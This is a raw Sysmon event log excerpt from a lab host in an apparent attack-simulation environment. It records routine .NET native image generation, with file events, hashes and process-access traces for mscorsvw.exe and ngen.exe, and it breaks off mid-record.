AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PY4T3ZF1R3\MIGUIControls.ni.dll.auxMD5=BF97070AA56208857E77DDEEA83109BD,SHA256=326E6DD2BA8B9BF5B75CCA3205254E7AC10176D848FC87D18A06C1E9116EBAD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A27C-60D3-A105-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PY4T3ZF1R3\MIGUIControls.ni.dllMD5=76E9EEA02767C773A79339C1DBE27F82,SHA256=2765FB70B131CB5557BD89D48D348B01D6D224791EDEBD3B6144B20CEE629D8D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C930BEE5780861962F40719D5F7270,SHA256=C3FA48A8DFF6851D9ABDD5C481D856E082F701E333385A825B1640A69684DC97,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.905{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-A27E-60D3-B605-00000000CF01}4996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IJVDTCX7FV\SMSvcHost.ni.exe.auxMD5=F74A5C62673AADD6F7A27322D6F5B93E,SHA256=5849A104C973E1BAAD8DBA932E8ED081DA176A546418F816C4A020B256027654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-A27E-60D3-B605-00000000CF01}4996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IJVDTCX7FV\SMSvcHost.ni.exeMD5=A245F968DBC50618BC1CD3606A115B62,SHA256=26D4260E0A153915A8A1DDED67B8ACA299F696D775A2E4C8ADA4F99E3B27C05B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.826{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-A27E-60D3-B505-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6J49RQU86W\SMDiagnostics.ni.dll.auxMD5=B3B2FF99EB867AF958674F42FEEFFFF6,SHA256=872F940493DB7736D87F8582B6E79191D08B83DFC74518E5DCCB0D56774E585C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-A27E-60D3-B505-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6J49RQU86W\SMDiagnostics.ni.dllMD5=0B3B438D2F1EF32655E8CACCB6F3464B,SHA256=FB9D103C858AB59E504D3371DEDA5FDBCE0E15875C3D1AA7FA196A0CC4BF529B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.795{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-A27E-60D3-B405-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8C2PTACWP1\SecurityAuditPoliciesSnapIn.ni.dll.auxMD5=87E6F94B31A4837D8DBC19D130730AE5,SHA256=5FD3FC5BC8626A921390E455021ACA24A0FE49C47EABD10C9E04ACD03F3AF220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-A27E-60D3-B405-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8C2PTACWP1\SecurityAuditPoliciesSnapIn.ni.dllMD5=A3454DE1CC12F337CC901E8FF596848E,SHA256=82DBBEFDF6A6CB1929401BAA71D253A452A98CF0E832014878D61BDCA0019A05,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.701{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.686{4DB9351A-A27E-60D3-B305-00000000CF01}5820NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q7ALGL644P\ReachFramework.ni.dll.auxMD5=E34CC248E3C1248214A25675F74431C9,SHA256=622B7DB7F53A92FB3762828FF64D1FE6C7B9B0370743814196B06B2B82C8268F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.686{4DB9351A-A27E-60D3-B305-00000000CF01}5820NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q7ALGL644P\ReachFramework.ni.dllMD5=9917712B31D067FF11C4299EBFA6B745,SHA256=AF1736104A745E7136D0D2C19E210634FC6A7158A9944200DEEDA6D26F4BC1DD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-A27E-60D3-B205-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DNTH5P07AZ\PresentationUI.ni.dll.auxMD5=2993C6918A12D9DDF1D4E2208521ECA0,SHA256=1BCD04BA0B2F9190D5A7D30364B046CD933FEA59A68BDE56C4A8AF9BD18B258E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-A27E-60D3-B205-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DNTH5P07AZ\PresentationUI.ni.dllMD5=C1CE6DAF775714C567D72FDA177E50E7,SHA256=25BDDFD52117B99B7BF3218A3B9E85016AF38184CE1F7E0B5A8B4ACB58182C6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.358{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0079A5C6258DEA0FA3EEC411B78BB5E1,SHA256=14A1AB7818DB1C80FC349363C0F96C16E6EFF9AA4BE187B3B27CDF92D8CBC3F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 